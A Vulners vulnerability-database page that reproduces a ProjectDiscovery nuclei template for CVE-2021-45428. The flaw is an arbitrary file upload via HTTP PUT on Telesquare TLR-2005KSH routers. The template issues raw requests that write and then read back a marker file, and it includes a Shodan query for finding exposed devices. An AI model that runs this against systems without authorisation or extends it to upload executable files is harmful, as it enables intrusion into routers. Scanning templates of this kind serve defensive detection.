Lucene search
K

Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 156 Views

Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload vulnerability with critical impac

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
TLR-2005KSH - Arbitrary File Upload Vulnerability
12 May 202200:00
zdt
GithubExploit
Ntemplatesbyxit
7 May 202615:36
githubexploit
ATTACKERKB
CVE-2021-45428
3 Jan 202214:15
attackerkb
Circl
CVE-2021-45428
3 Jan 202216:44
circl
CNNVD
Telesquare TLR-2005KSH 安全漏洞
3 Jan 202200:00
cnnvd
CNVD
Telesquare TLR-2005KSH Access Control Error Vulnerability
5 Jan 202200:00
cnvd
CVE
CVE-2021-45428
3 Jan 202213:25
cve
Cvelist
CVE-2021-45428
3 Jan 202213:25
cvelist
Exploit DB
TLR-2005KSH - Arbitrary File Upload
11 May 202200:00
exploitdb
NVD
CVE-2021-45428
3 Jan 202214:15
nvd
Rows per page
id: CVE-2021-45428

info:
  name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
  author: gy741
  severity: critical
  description: |
    TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized accessand data leakage.
  remediation: |
    Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability.
  reference:
    - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
    - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45428
    cwe-id: CWE-639
    epss-score: 0.56931
    epss-percentile: 0.98948
    cpe: cpe:2.3:h:telesquare:tlr-2005ksh:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: telesquare
    product: tlr-2005ksh
    shodan-query: http.html:"TLR-2005KSH"
  tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm,vuln

http:
  - raw:
      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        PUT /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

        CVE-2021-45428
      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 404 && status_code_2 == 201'
          - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
        condition: and
# digest: 4b0a00483046022100deabc2dd4d10687fc7061c13b6b0995f1f0ec625ef988980fa883df75e38f8af022100927be988ac22af92d92778083297a4880cfff17b789765791d2dd5ee51049dfe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.56931
156